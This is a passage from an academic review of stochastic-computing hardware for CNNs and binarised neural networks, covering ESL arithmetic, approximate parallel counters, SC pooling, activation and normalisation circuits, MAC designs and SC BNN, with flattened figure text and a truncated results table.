eliminating parallel counter. Integer stream also allows short stochastic stream length, thus speeding up the SC time. They also proposed integer version of TanH k-state FSM because the traditional stochastic TanH (Stanh) function on FSM only accepts stochastic bits, thereby leading to the modern TanH FSM design. However, integral SC only solved the precision degradation issue, and many other CNN functions are yet to translate to SC domain. Moreover, the usage of binary adder and multiplier may not scale well in the case of deploying large CNN models. They claimed energy saving of 21% compared with the full binary radix computing but is still far from the expected power reduction in the SC transition. Extended stochastic logic (ESL): another radical approach ESL made an extreme modification to the SC methodology if integral SC is not radical enough. Instead of using a single stochastic bitstream for a value, ESL used two stochastic streams such that their ratio of division represents the actual value (Canals et al., 2016). ESL intends to compute the entire range of real numbers in the stochastic domain. For example, if x* is a whole number, then x* = p*/q*, where p* and q* are the ESL stochastic pair for x*. p* and q* remain in real number∈ [−1,1] in the bipolar format, but obtaining its ratio x* can translate to the entire range of real numbers ∈ [−∝,∝]. Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 12/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-7 http://dx.doi.org/10.7717/peerj-cs.309 S1 S2 D C ENB Multiplexer 0.5 p* s* q* r* q* s* t* u* p* r* q* s* t* u* ESL multiplier p* s* q* r* t* u* ESL divider ESL Adder/Subtractor A B C Figure 8 ESL arithmetic unit. (A) ESL multiplier. (B) ESL divider by crossing multiplication. (B) ESL adder and subtractor circuit. Full-size DOI: 10.7717/peerjcs.309/fig-8 ESL requires dedicated logic gate for p* and q* stochastic streams. Taking Figs. 8A and 8B as an example, if x* = p*/q* and y* = r*/s*, then by probability math, multiplication between two separable stochastic streams will be: x∗×y∗= p∗×r∗ q∗×s∗ = t∗ u∗ , (8) where t* and u* are the output pair of stochastic streams. Division can be done simply by flipping the nominator and denominator of the second stochastic pair. In the case of stochastic addition, the stochastic pair can be processed such that: x∗+y∗= p∗ q∗ + r∗ s∗ = p∗×s∗+q∗×r∗ q∗×s∗ = t∗ u∗ , (9) whereas subtraction can be done by NOT gate inversion as shown in Fig. 8C. Value splitting is feasible in the stochastic domain due to the nature of probabilistic computing. However, splitting into double stochastic streams complicated everything, including a compulsory custom bipolar divider (convert t* and u* back to real number representation) before bipolar TanH function blocks. The custom block extensively used comparator and RNG, which add a red flag for efficient computing. The neural network may compute in the real number ∈ [−∝,∝] on the early day, but the CNN nowadays Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 13/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-8 http://dx.doi.org/10.7717/peerj-cs.309 commonly compute in bipolar math. After all, the final output class of CNN only need to tell the computer whether the probability ∈ [0,1]. ESL did provide an insight into how SC can perform normal arithmetic full-range computation. However, verifying whether ESL is better than other SC methods for CNN use case despite the attractive circuit simplicity in primary arithmetic operations is hard due to the non-linear activation function complexity in ESL implementation. Approximate parallel counter (APC) and Btanh: a simple and energy-efficient approach Implementing radical changes in every SC component might not be easy. Thus, another highly effective approach with traditional stochastic bitstream is APC. Other than the frontend binary to stochastic conversion stage of SNGs, the final stochastic to binary conversion stage is also equally important (Kim, Lee & Choi, 2016a; Kim, Lee & Choi, 2016b). In the case of accumulating multiple bitstreams, MUX adder could become inaccurate due to loss of n−1 bits input information (Li et al., 2017c). In this case, a parallel counter as the one in Fig. 9B is preferred consisting of an array of full adders (FA), but FA is relatively expensive as it uses binary adder logic circuits. The accurate parallel counter should no longer be used as SC is already based on approximate computation. Thus, an APC has been proposed to reduce the FA components with a slight trade-off on accuracy whilst achieving the same counting function at lower area and power consumption as shown in Fig. 9A. The proposed APC could save area and power by 38.3% and 49.4%, respectively. The caveat is that the output from APC is in the binary domain; thus, directly removing any stochastic stream from the stochastic domain computation. Although the traditional Stanh uses single input k-state FSM, with the inspiration from integral SC research, the binary output from APC is cleverly reused as an input for another modified binary input FSM called Btanh. TanH activation function is essential in CNN. For example, if the binary output value is 4, then the FSM will directly jump four states instead of step-wise jumps in Stanh. More granular Tanh step-function could also be achieved, which is not possible with Stanh FSM. In the end, the binary output values from APC will be indirectly converted back to stochastic stream with TanH non-linear function applied, completing the stochastic convolution computation as depicted in Fig. 9C. Moreover, energy usage can be further reduced by 69% by sacrificing 1.53% of accuracy with EDT, that is, terminating computation at 50% of the computing time. Then, their APC and Btanh components had become the foundation for other SC CNN approaches in the next coming years. Near-perfect SC implementation in CNN algorithm Ren et al. (2016), Li et al. (2017c); Li et al. (2017b), Ren et al. (2017) and Li et al. (2018a) proposed a complete overview of a near-perfect CNN analogy in the SC domain, including the following: the missing pooling layer, ReLU and sigmoid activation layer, and normalisation layer which will be discussed separately in the sub-sections below. Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 14/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.309 Sum Cin Cout x2 x1 Full Adder Sum Cin Cout x2 x1 Full Adder Sum Cin Cout x2 x1 Full Adder Sum Cin Cout x2 x1 Full Adder 2 3 2 2 2 1 2 1 Approximation Unit Sum Cin Cout x2 x1 Full Adder Sum Cin Cout x2 x1 Full Adder Sum Cin Cout x2 x1 Full Adder Sum Cin Cout x2 x1 Full Adder Sum Cin Cout x2 x1 Full Adder Sum Cin Cout x2 x1 Full Adder Sum Cin Cout x2 x1 Full Adder Sum Cin Cout x2 x1 Full Adder Sum Cin Cout x2 x1 Full Adder Sum Cin Cout x2 x1 Full Adder Sum Cin Cout x2 x1 Full Adder 2 0 2 1 2 2 2 3S1 S15 S1 S16 Parallel Counter Btanh activation S1 S2 Sn‐1 Sn n Stochastic streams Binary of log2n bit Stochastic streams A B C Figure 9 SC bitstream accumulation. (A) APC. (B) Accurate parallel counter. (C) Accumulation and Btanh activation workflow. Full-size DOI: 10.7717/peerjcs.309/fig-9 SC average pooling and max-pooling layers The purpose of CNN pooling layer is to reduce memory usage and reduce model size. Ren et al. (2016) first used cascaded MUX as the average pooling function in CNN as shown in Fig. 10A. This solution is simple but may face the precision loss issue as described in the Integral SC research. Average pooling may not help in CNN training convergence either. Ren et al. (2017) proposed max-pooling hardware equivalent to the widely adopted CNN max-pooling layer. The stochastic stream with a maximum value at any given time in the stochastic domain could not be verified. Hence, a dedicated counter for each stochastic stream is required to sample and evaluate which stream is of maximum value. By referring to Fig. 10B, the counter samples the first few bits and compare the magnitude at the end of bitstream sampling to make an early decision on which stochastic stream should be chosen to continue the path. The first few bit information could be inaccurate and thus is an approximate max pooling. Nevertheless, the decision will eventually converge to the bitstream of maximum value if the sampling continues due to the properties of SC progressive precision. Moreover, if the bitstream is long, then less information will be lost, thereby achieving negligible accuracy loss. Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 15/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-9 http://dx.doi.org/10.7717/peerj-cs.309 S1 S2 D C ENB Multiplexer S1 S2 D C ENB Multiplexer S1 S2 D C ENB Multiplexer 0.5 0.5 0.5 Average pooling S1 S4 D C2C1 ENB Multiplexer C o u n te r C o u n te r C o u n te r C o u n te r Comparator Max pooling u1 x1 En Tanh S1 S2 D C ENB Multiplexer Max(X,Y) X Y u1 x2 x1 Tanh Max u1 x2 x1 Tanh Max u1 x2 x1 Tanh Max Max pooling S1 S3 S2 S4 S1 S3 S2 S4 S1 S3 S2 S4 Tanh Max A C B Figure 10 SC pooling function. (A) 2×2 average pooling with cascaded MUX adder. (B) hardware- oriented approximate max pooling circuit. (C) Stochastic MAX function, cascading them will create pure SC max pool block. Full-size DOI: 10.7717/peerjcs.309/fig-10 However, a more straightforward stochastic max-pooling block was proposed by Yu et al. (2017). With only an XOR gate, FSM and MUX, a novel stochastic MAX block could select whichever stream of higher value. With XOR gate controlling the FSM state jumping, the probability of the opposite stream could be inferred from another bitstream by generating the condition of bit entanglement. As such, whenever the FSM sampled a 0’s bit from the current bitstream, it implies a 1’s bit on the opposite bitstream. Thus, whenever inequality between two bitstreams exists, the FSM state will be biased to the one with higher magnitude, completing the MAX function with the MUX. Cascading the MAX function block could realise the max-pooling function block as shown in Fig. 10C. SC ReLU and sigmoid activation layer The CNN activation layer is similar to the usual neuron activation function. ReLU function, as the name suggests, performs rectification and cutting off any negative value such that: f (x)=max(0,x). (10) ReLU function is trendy due to its fast computation and solves diminishing return in backward propagation learning during the CNN training stage. However, no SC equivalent circuit existed for that particular function; thus, Li et al. (2018a) proposed a novel SC-based ReLU function block as depicted in Fig. 11A. Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 16/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-10 http://dx.doi.org/10.7717/peerj-cs.309 xn u1x2 x1 Stochastic stream pooling S1 S2 D C ENB Multiplexer u1 x2 x1 Linear FSM x1>x2 x2 x1 Comparator Accumulator Half‐clock up counter State number ReLU(X) + Parallel Counter ‐ Parallel Counter x‐ ‐ u1x+ + Adder Q Q SET CLR D >0 S1 S1 Sn bias + /4 S1 S1 Sn bias ‐ /4 Sigmoid(X) A B Comparator Figure 11 Other SC activation functions. (A) ReLU activation function. (B) SC sigmoid activation func- tion with bias input. Full-size DOI: 10.7717/peerjcs.309/fig-11 Firstly, the ReLU amplitude will be naturally maxed out at value = 1 in the stochastic domain, but this is not a concern as clipped ReLU has no significant accuracy degradation (Fei-Fei, Deng & Li, 2010). Secondly, a negative value must be clipped to zero. Notably, the number of 0’s bit in the bipolar stochastic stream determines the magnitude of negativity. Thus, when the accumulated value is less than the reference half value (the 0’s bit is more than 1’s bit) in a given sample time, the output will be forced to be 1’s bit. Otherwise, the output will follow the pattern of emulated linear function from the FSM. Although real number convergence in the accumulator takes time, the real value information is equally distributed in the stochastic bitstream. Hence, obtaining an accurate comparison is possible by observing the first few bits of information; thus, inaccuracy is negligible. Moreover, the comparison is synchronous to the input; therefore, no latency will be incurred. In the case of larger and deeper CNN models such as VGGNet and GoogleNet, the sigmoid function becomes more favourable as non-linear function. As such, Li et al. (2017a) proposed a hardware-oriented SC sigmoid approximation function as shown in Fig. 11B. Since the output of the stochastic stream is maxed at 1, the Taylor series expanded Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 17/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-11 http://dx.doi.org/10.7717/peerj-cs.309 sigmoid function could be approximated as: 1 1+exp(−x) ≈   1,x >2 1 2 + 1 4 x,−2≤x ≤2 0,x <−2 . (11) By strategically partitioning the positive summation and negative summation in such a way that: A= 1 4 ∗ ∑ pos P ·Q+ 1 2 + bias+ 4 ,B= 1 4 ∗ ∑ neg P ·Q+ bias− 4 , (12) the approximate stochastic sigmoid activation function could then be realised by subtracting both parts such that: A−B= 1 2 + 1 4 (∑ P ·Q+bias ) , (13) where ‘P’ and ‘Q’ are the weight and pixel value respectively. Therefore, by pre-scaling the weights and bias to quarter times, the stochastic sigmoid function could be devised as a result, with the added benefit of including bias information which is missing in the previous SC CNN implementation. The binary adder now is the sigmoid activation function itself, eliminating the need for extra hardware cost such as FSM. However, unlike the APC + Btanh function block, the accurate parallel counter is needed. The sigmoid function is not limited to CNN algorithm, or rather, is a universal activation function in other DNN classifier algorithms such as multilayer perceptron and restricted Boltzmann machine. With 1024-bit length stochastic stream, the proposed SC sigmoid activated convolution neuron block could perform as accurate as binary computing CNN while consuming 96.8% and 96.7% less area and power respectively, hugely improving the capability of SC in the DNN algorithm computation in general. SC normalisation layer The purpose of the normalisation layer is to reduce internal covariance, thereby improving the overall CNN output accuracy. If the ReLU activation is applied to the previous layer, only a simple local response normalisation function is required, which can be summarised as: bix,y = aix,y( k+α ∑min(N−1,i+n/2) j=max(0,i−n/2) ( ajx,y )2)β , (14) where the summation part accumulates all N numbers of adjacent neuron output of aix,y. ‘k’, ‘n’, ‘ α’, and ‘β’ are hyperparameters which can be determined by CNN backpropagation training. The complexity of the mathematical relationship can be decoupled into three compute components, square and sum (calculate the denominator components), exponential function with ‘‘β’’ and finally division. Li et al. (2017c) used stochastic square, FSM activation block and traditional gradient descent SC divider to construct SC normalisation circuit as shown in Fig. 12 to perform SC normalisation. Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 18/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.309 u2 u3 u4 u5 x3 x4 x5 u1 x2 x1 SC Square Array x3 x4 x5 u1 x2 x1 APC Adder FSM based Normalisation block function, K, α, β u1 x2 x1 SC Division Neuron out 1 Neuron out 3 Neuron out 5 Divident Normalised Neuron out 3 Stochastic domain Binary domain Divisor Stochastic domain Figure 12 Normalisation unit in SC CNN. Full-size DOI: 10.7717/peerjcs.309/fig-12 The accuracy had improved with SC normalisation function and only dropped by 0.88% compared with the original binary AlexNet CNN model, achieving six times in the area and five times in power savings compared with binary equivalent normalisation. However, they could have utilised newer SC divider as discussed in the basic concept section. Other optimisations The dropout layer is one of the regularisers in CNN to prevent overfitting. However, dropout layer functions only at the CNN training phase, and no custom hardware adaptation is needed at the inference stage, hence no extra hardware overhead. Li et al. (2018a) optimised the APC function block by utilising inverse mirror FA to reduce the number of transistors required for single FA from 32 to 24 transistors. They also proposed the APC design which input is not a power of two by incorporating inverse half adder. APC optimisation further reduced the area required by at least 50% and an average of 10% improvement in energy efficiency. In terms of SC accuracy, the bipolar format remains the major limitation as bipolar is generally worse than the unipolar in terms of SC accuracy (Ren et al., 2016). To overcome the signed value accuracy limitation, Zhakatayev et al. (2018) decoupled the sign information from the stochastic stream and added one stochastic bit pair specifically to store the sign value. Unlike stochastic probability value, the sign value of a stochastic stream is deterministic, thus, can be processed separately from the stochastic magnitude. Although small hardware overhead is needed to process the sign function, such as an extra XOR gate to multiply signed value, the accuracy gain is significant, 4∼9.5 times better compared to the bipolar format. With that advantage in mind, the little extra hardware cost for sign processing is trivial. Binary Interlaced SC, two is better than one Full-fledged SC CNN might not be feasible to fit a wide variety of modern complex CNN models. However, the massive multiplication parallelism of SC is still very favourable. Thus SC-based multiply-accumulate (MAC) unit was proposed by Sim & Lee (2017) as shown in Fig. 13A to act as multiplier accelerator for binary computing. The MAC leverages the parallelism of SC multiplier, then accumulate value with accurate parallel counter, Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 19/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-12 http://dx.doi.org/10.7717/peerj-cs.309 u2 u3 u4 u5 un x3 x4 x5 xn u1 x2 x1 XNOR gate array x3 x4 x5 xn u1 x2 x1 Parallel Counter u2 u3 u4 u5 un u1 x1 Accumulator 1+log2n B in a ry S to ch a st ic st re a m s SNG SNG SNG SNG SNG Normal SC Weight push ahead Down Counter Counter Counter Counter 01011010 10101010 00001010 01011010 00001111 00001010 4/8 4/8 4/8 4/8 4/8 4 00001010 00001111 Stop counting Stop signal 2/8 2/8 2/8 S1 S4 D C2C1 ENB Multiplexer clk x2 x1 Custom FSM Time x3 x2 x1 x0 0,x3,x2,x3,x1,x3,x2,x3,x0,x3,x2,x3,x1,x3,x2,x3 A B C B in a ry i n p u t Figure 13 Binary interlaced SC, where SC is used as MAC accelerator. (A) SC MAC unit block. (B) SC MAC optimisation by cutting off SC early with advancing weight bits. (C) Novel SNG with MUX and FSM. Full-size DOI: 10.7717/peerjcs.309/fig-13 returning pure binary value to other binary computing circuits at the end of SC cycle. This approach, while not the most energy-efficient one, achieved two times the area efficiency and at very high throughput compared to binary computing. With only a single layer SC in mind, Sim et al. (2017) further leveraged the SC MAC to perform unipolar SC multiplication. All the stochastic 1’s bit of the neuron weight value was pushed ahead of time by down counting the weight value so that the SC cycle could terminate when the stream tail of the weight ended with 0’s bit as depicted in Fig. 13B. This event is possible because any section of the stream could represent the true value of the stream due to the probabilistic nature. It is technically feasible as long as single layer SC is concerned. They Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 20/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-13 http://dx.doi.org/10.7717/peerj-cs.309 also proposed a novel MUX FSM based SNG. By predefining the MUX selection sequence in such a way that the output is the sum of binary weight, the binary input could be directly converted into a stochastic stream as depicted in Fig. 13C, eliminating the need of WBGs which could be expensive in FPGA implementation. With the strategic down-counting timing, an area-delay product reduction of 29%∼49% is achieved while being 10%∼29% more energy efficient compare to binary computing. In any case, they ignored the SNGs hardware overhead in performance comparison. Considering that only a single SC layer is required, Hojabr et al. (2019) radically redesigned the MAC unit by exploiting computing pattern in modern CNN design and proposed Differential MAC (or DMAC). Firstly, because CNN ReLU function always returns positive value, in addition to the binary pixel of positive value, thus, up/down counter could be used as ReLU function. Secondly, considering that a pixel value will eventually pass through all the weight multiplication matrix of CNN scanning window in the convolution process, the neuron weights could be sorted offline ahead of time. In this way, the weight differential from the next sorted weight of higher value is guaranteed to be positive, thus, can be fed to a down counter similar to SC MAC to pipeline the stochastic multiplication. Since the first weight is of minimum value which could be negative, a D Flip-Flop is used to hold the sign information just for the first bipolar multiplication. Thus, multiplying in SC is as simple as counting the number of bits from the MUX AND-ing with counter ‘enable’ control from the weights as depicted in Fig. 14. The FSM could be shared among all MUX, ignoring the stochastic correlation issue because the multiplication is mutually independent (Yang et al., 2018). The buffered accumulated value will then continue the summation operation as the DMAC final stage. This major circuit overhauling could deliver 1.2 times and 2.7 times gains in speed and energy efficiency respectively relative to the former MAC with the benchmarking on more modern CNN models. Stochastic quantisation, SC is going asynchronous In the face of quantised binary CNN whereby the arithmetic is lower than 8-bit precision, no optimisation had been done on the SC CNN counterpart. SC could consume a lot of logic gates as well, especially in CNN use case. Thus, Li et al. (2018b) proposed a novel multiplier with shifted unary code (SUC) adder. From the binary interlaced SC research, the weights do not have to follow probability distribution as the pixel value does, as long as the next SC component is not computing in the stochastic domain. By strategically using the weight information as a timing control for SC multiplication, meaningful bits from each stream could be quantised and unified into a single multiply-sum-averaged stochastic stream by OR-ing the parallel bitstreams asynchronously as depicted in Fig. 15. The SUC adder significantly reduced the requirement of parallel counter whereby its internal FA is expensive in the perspective of SC. The area and power savings are significant as a result, as much as 45.7% and 77.9% respectively relative to usual unipolar SC with less than 1% accuracy loss compared to quantised binary CNN, paving the way for more efficient parallel counting accumulation mechanism in SC CNN. Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 21/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.309 U/D Reset B1 B4 Carry out ENB Counter U/D Reset B1 B4 Carry out ENB Counter U/D Reset B1 B4 Carry out ENB Counter S1 S4 D C2C1 ENB Multiplexer S1 S4 D C2C1 ENB Multiplexer S1 S4 D C2C1 ENB Multiplexer reset x2 x1 Custom FSM U/D Reset B1 B4 Carry out ENB Down Counter Q Q SET CLR D B in a ry 1 B in a ry 2 B in a ry n w2 w1 Scheduler O u tp u t b u ff e r w2=w2‐w1 weight indexer Binary Domain Stochastic Domain Binary Domain Sign index P(X1) P(X2) P(Xn) I1 weights Figure 14 Differential MAC. Major overhauling to the SN MAC with counter and differential weight control indexing to pipeline the SC MAC computation. Full-size DOI: 10.7717/peerjcs.309/fig-14 Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 22/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-14 http://dx.doi.org/10.7717/peerj-cs.309 SNG SNG SNG SNG a b c d 1001010111000101 1100101011100010 0110010101110001 1011001010111000 0000000000001111 0000000011110000 0000111100000000 11110000000000001/4 1/4 1/4 1/4 1001101001111000 a/4+b/4+c/4+d/4 SUC Adder SNG SNG Parallel Counter SNG SNG SNG SNG u1 x2 x1 SUC Adder u1 x2 x1 SUC Adder u1 x2 x1 SUC Adder Bias+ x‐ ‐ u1x+ + Adder Q Q SET CLR D >0 Sigmoid(X) SNG SNG Parallel Counter SNG SNG SNG SNG u1 x2 x1 SUC Adder u1 x2 x1 SUC Adder u1 x2 x1 SUC Adder Bias‐ A B Figure 15 Stochastic quantisation accumulation with SUC adder. (A) The different information por- tion of the stochastic stream could be encoded into a single stream by OR-ing the required bitstream asyn- chronously. (B) SUC paired with SC sigmoid activation function. Full-size DOI: 10.7717/peerjcs.309/fig-15 Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 23/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-15 http://dx.doi.org/10.7717/peerj-cs.309 S1 S2 D C ENB Multiplexer S1 S2 D C ENB Multiplexer Vin V/4 V/2 3V/4 V V V Y0 Y1 Y2 Vin Y2 Y1 Y0 <V/4 <V/2 <3V/4 >3V/4 0 0 0 0 0 1 0 1 1 1 1 1 X2 X1 X0 Y6 0 0 0 0 1 0 0 0 0 1 0 1 0 0 1 1 0 Binary Thermometer code Y5 Y4 Y3 Y2 Y1 Y0 0 0 0 1 1 0 1 1 1 1 1 1 11 1 11 1 11 11 11 1111 1111 111111 1 0 0 0 0 0 0 0 00 0 0 00 0 0 0 0 0 0 0 0 0 0 0 Y6 Y5 Y4 Y3 Y2 Y1 Y0 X2 X1 X0 A B Figure 16 ASC with thermometer coding. (A) Implementation of ASC on thermometer-encoded SC cir- cuit, eliminating the need for ADC and memory components. (B) Thermometer coding could be utilised for SNGs. Full-size DOI: 10.7717/peerjcs.309/fig-16 Analog-to-Stochastic Converter, SC CNN is ready to be embedded In the case of direct interfacing with analogue input, such as analogue camera sensor, Analog-to-Digital Converter (ADC) is usually being deployed, but at the cost of requiring memory storage. Zhang et al. (2019) proposed a novel converter, namely, Analog-to- Stochastic converter (ASC) as shown in Fig. 16A where the analogue voltage differential could be directly decoded into stochastic streams with thermometer encoding scheme. The stochastic stream could either be encoded via LFSR, counter, or newly proposed thermometer coding as depicted in Fig. 16B. The thermometer coding is capable of generating parallel bit streams at once but has higher error compared to the others. Nevertheless, with long enough bitstream length, those error is negligible. The thermometer encoding enabled the design of novel ASC which allows SC CNN to be directly interfaced with analogue voltage input, eliminating ADC and memory storage. SC CNN is meant for memory-centric computing Notably, SC CNN does require a tremendous amount of weight data similar to fixed point binary CNN. Despite many SC CNN architecture innovations, however, without efficient weight storage near to SC elements, SC CNN will suffer memory bandwidth bottlenecking similar to the binary computing. Since the weight information is fixed from the training process, those data can be stored in a more area and power-efficient non-volatile Domain-Wall Memory (DWM) (Ma et al., 2018) built beside the SC elements. Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 24/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-16 http://dx.doi.org/10.7717/peerj-cs.309 XNOR gate 0(‐1) 0(‐1) 1(+1) 0(‐1) 1(+1) 1(+1) 1(+1) 0(‐1) 0(‐1) 0(‐1) 1(+1) 1(+1) Encoding (value) XNOR multiply SC bipolar multiply BNN vector multiply 0 0.2 0.5 1 ...0100101 ...1011010 ...1101100 ...1111011 A B C Figure 17 SC BNN methodology. (A) The similarity of SC and BNN in terms of logic gate utilisation. (B) Usual configuration in binary BNN. (C) SC BNN first layer binary image conversion in SC BNN. Full-size DOI: 10.7717/peerjcs.309/fig-17 This strategy could eliminate memory bandwidth bottlenecking by bringing memory closer to the computing element, namely, memory-centric computing or in-memory computing. SC CNN can greatly benefit from memory-centric architecture due to the nature of massive parallelism. Memoisation approach could also be executed in memory-centric design by storing the weight data directly in a predefined stochastic bitstream representation instead of original binary values. As such, sequential read of stochastic bit from DWM could use less energy while reducing the SNGs usage. Further area reduction could be achieved by sharing APC and weights. Thus, an area and power reduction of 52.6% and 17.35 times were reported respectively relative to standard SC CNN as a result of resource sharing and more efficient memory-centric architecture in the SC CNN circuit. SC implementation in BNN: the best of both worlds As mentioned earlier in the basic concept section, BNN challenged the existence of SC circuits in CNN computing. As the saying goes, the enemy of an enemy is a friend, and considering that SC and BNN target efficient CNN computation, why not combine both to maximise the benefits from both aspects, which is what (Hirtzlin et al., 2019) precisely targeted for. The inspiration for this particular approach is that the SC and BNN come into the same conclusion that XNOR gate can be used as a bipolar multiplier, as depicted in Fig. 17A, despite different directions of development. If somehow a way to process the BNN model in stochastic mean exists, then the SC can take a free ride to the BNN’s internal logic. Although BNN process information at the bitwise level in the hidden layer, the initial layer still needs to deal with input images of fixed-point binary number as shown in Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 25/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-17 http://dx.doi.org/10.7717/peerj-cs.309 Fig. 17B. In most cases, ALU is utilised for real number calculation, or digital signal processing unit in the case of FPGA. They attempted to fuse the SC domain onto the first layer by translating image input into stochastic bitstreams and then exploiting SC logic similarity in BNN for bipolar multiplication to take advantage of the BNN logic. However, unique data pre-processing is needed so that the trained network is trained on a serialised stochastic binary image instead of the original grayscale image. The input image is converted into multiple stochastic image representations as shown in Fig. 17C where the bitstream generation of each pixel follows the function of SNG. Then, the number of stochastic images generated is equal to the stochastic bit length of the data. A ‘popcount’ accumulator is implemented at the end of the layer to restore the real number before proceeding to the next threshold function, which had replaced the activation function and batch normalisation. The difference of their BNN usage compared with the general BNN is that they treated the BNN XNOR gate as if it is of SC CNN stochastic logic. Notably, the SC only apply on the first layer, and the rest of the hidden layer still follows BNN logics. In the end, they claimed to have 62% area reduction whilst only suffer 1.4% accuracy degradation in Fashion-MNIST dataset classification compared with the binary first-layer BNN. They also claimed that with three stochastic image representations, SC BNN could achieve the same performance as binary BNN implementation at 2.4 times lower energy usage, which is very similar to the EDT approach. They even extended the experiment with advanced CIFAR-10 images with RGB channels. By following the same image conversion principle in channel-wise, the SC BNN achieved the same accuracy as full binary BNN, proving that eliminating ALU at the first BNN layer is possible. Nevertheless, one possible confusion is that they could have mistaken the BNN weight information as part of the stochastic domain. The BNN weights were trained in the binary domain with images of real fixed-point value, but it is not a concern as long as the BNN weights are represented in fully quantised ‘−1’ or ‘1’ vector regardless of the computing domain. DISCUSSION We discussed the SC CNN and BNN elements in component-wise. However, a visualisation approach is necessary to obtain the full picture of how are they exactly being stacked together as SC CNN and SC BNN, which no one had emphasised on in almost all related studies. Otherwise, novel readers might be having a hard time to grasp the idea and motives behind the effort of SC development, particularly for those studies mentioned above with the mixed bag of vastly different fields of study. SC CNN and SC BNN from a holistic perspective Modern computing handles the CNN computation by aggregating all values layer-by-layer until the final class output is converged. The hidden truth behind the oversimplified drawing of CNN as in Fig. 6C is that there could have a lot of data accumulation and transfer between the processor and memory. Even if modern GPUs could parallelise thousands of arithmetic operations, it still takes time to buffer computed data into local memory for each feature map or layer, because it is impossible to read and write on the same memory at the same time. Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 26/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.309 BtanhBtanh A PC A PC SN bit SN bit SN SN BN SNSN SN BN SN SN SN BN SN BN Dense/classification layerFlatten 14px Conv2 LayerConv1 Layer 25px WBG array 7*7 XNOR gate Conv1 weight 7*77*7 pixel SNG Conv2 weight 5*5 WBG array 5*5 XNOR gate 5*5 px WBG array Dense1 weight 14px *5 14*5 XNOR gate 5 neurons 1 SC clock cycle 5 classes *BN = Binary number *SN = Stochastic number A PC Btanh A PC Btanh A PC A PC A PC A PC A PC BtanhBtanhBtanhBtanhBtanh Counter Counter Counter Counter Counter BN Figure 18 Process flow in SC CNN and the internal computing domain interchange. Full-size DOI: 10.7717/peerjcs.309/fig-18 Conversely, SC handles the computation information in a different approach as depicted in Fig. 18. Due to the extreme parallelisation capability of the SC circuit, all of the data could be technically preloaded into local memory before the starting of the SC cycle. Although stochastic stream could take hundreds or even thousands of clock cycles to complete (each clock for each stochastic bit), SC pipelined all CNN arithmetic operation from top-down. Thus, all of the bits at a particular moment passed though all CNN layers at every SC clock cycle. If a clock cycle took 1 µs, then a full-fledged SC CNN inference with 1-kilobit length stochastic streams could, in theory, complete the CNN computation in under 1 ms. By then, a new full-sized image data could have been buffered asynchronously readily available for the next SC cycle. Thus, in the perspective of the SC circuit, memory bandwidth bottlenecking might not be an issue. The simple computing elements in SC allow large-scale parallelisation, which is incredibly favourable to CNN hardware implementation in edge computing application. The advantage will only be highly prevalent when noise tolerance is essential at a higher clock speed in the future of computing or deployment of a big CNN model which requires larger data parallelisation. In the case of SC BNN as illustrated in Fig. 19, the converted stochastic images could exploit the BNN XNOR logic for SC, eliminating the need for ALU. Although the SC domain ended at the first layer, the subsequent BNN bipolar multiplication, accumulation and threshold loops do not take much computing time either, virtually single-layer pass in one or few clock cycles. Given the nature of the layer-wise operation, BNN could in practice allow layer folding, that is, reusing the computer components of the previous layer by reloading weight information (Mittal, 2020), further reducing the area and power required which are not possible on SC CNN. SC BNN also allows in-memory computation because those bit weights can be stored right next to the computing gate arrays, further improving energy efficiency by eliminating the cost of communication bandwidth. The ensemble technique on BNN could also perform as accurate as full precision DNN Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 27/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-18 http://dx.doi.org/10.7717/peerj-cs.309 1 st layer Stochastic binarised images …T SNGs Grayscale image Loop for T times, accumulate and threshold into BNN bipolar bit Loop for k layers Hidden layer Final layer argmax BN SN BN BitSN Bit BN *BN = Binary number *SN = Stochastic number *Bit = BNN bit vector p o p co u n t A cc u m u la te a n d T h re sh o ld [ ‐1 ,1 ] p o p co u n t Binarised weights [‐1,1] C la ss e s Figure 19 Process flow in SC BNN, stochastic image generation methodology and the internal com- puting domain interchange. Full-size DOI: 10.7717/peerjcs.309/fig-19 Table 1 Performance difference across SC and conventional binary domain. CNN Model Platform Year Method Area (mm2) Power (W) or energy (nJ) Accuracy (%) Energy efficiency (images/J) or (GOPS/W) CPU 2009 Software 263 156 W 99.17 4.2 GPU 2011 Software 520 202.5 W 99.17 3.2 ASIC 2016 SC 256 bit (Ren et al., 2017) 